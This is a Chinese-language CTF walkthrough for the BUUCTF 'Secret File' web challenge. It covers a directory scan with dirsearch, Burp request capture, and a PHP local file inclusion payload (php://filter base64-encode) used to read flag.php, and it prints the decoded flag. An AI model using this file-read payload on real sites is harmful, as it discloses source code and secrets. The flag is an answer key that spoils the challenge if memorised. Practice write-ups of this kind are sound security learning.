[极客大挑战 2019]Secret File 1

题目环境:
[极客大挑战 2019]Secret File 1_第1张图片

网页什么都没有,GET那里也没有任何参数和文件

F12查看隐藏文件
[极客大挑战 2019]Secret File 1_第2张图片
发现隐藏文件
点进去看看
[极客大挑战 2019]Secret File 1_第3张图片
发现一个可点击按钮
SECRET
[极客大挑战 2019]Secret File 1_第4张图片

好家伙,什么都没有

这里猜测还有隐藏文件
目录扫描
使用工具dirsearch
命令:
python dirsearch.py -u [http://a9c9b5bd-4430-4ffb-88bf-0eec1fa73296.node4.buuoj.cn:81/](http://a9c9b5bd-4430-4ffb-88bf-0eec1fa73296.node4.buuoj.cn:81/)
[极客大挑战 2019]Secret File 1_第5张图片[极客大挑战 2019]Secret File 1_第6张图片
发现隐藏文件flag.php
补充一点,这里我用御剑没有扫描出来,不知道是什么问题,有知道的师傅还望解答,感谢!
[极客大挑战 2019]Secret File 1_第7张图片
访问flag.php
[极客大挑战 2019]Secret File 1_第8张图片
有内容但是flag没有显示出来,猜测flag是被编码了,需要用到PHP伪协议,但是不知道具体参数是什么,这里需要抓包
burpsuite抓包

使用火狐浏览器访问题目地址

[极客大挑战 2019]Secret File 1_第9张图片
点击SECRET进行抓包
右键后,Repeater进行重放
[极客大挑战 2019]Secret File 1_第10张图片
[极客大挑战 2019]Secret File 1_第11张图片
访问隐藏文件secr3t.php
[极客大挑战 2019]Secret File 1_第12张图片
strstr函数查询…/,tp,input,data在file变量里面是否存在,存在则输出0h no!
这对构造PHP伪协议毫无影响
[极客大挑战 2019]Secret File 1_第13张图片

使用参数file访问flag.php文件
回显结果更是表明了flag.php文件内容被编码了

构造PHP伪协议:
**php://filter/read=convert.base64-encode/resource=flag.php**
最终payload:
**URL/?file=php://filter/read=convert.base64-encode/resource=flag.php**
回显结果:
[极客大挑战 2019]Secret File 1_第14张图片
可以看到是明显的base64编码格式
放到Kali进行base64解码
echo "PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7ZTI0OTJhMTktZDhjYi00OGYzLWIwOTctYjM0OGQyNjEwZmExfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=" | base64 -d
回显结果:
[极客大挑战 2019]Secret File 1_第15张图片
得出flag:
flag{e2492a19-d8cb-48f3-b097-b348d2610fa1}

你可能感兴趣的:(CTF做题笔记,网络安全,web安全,php)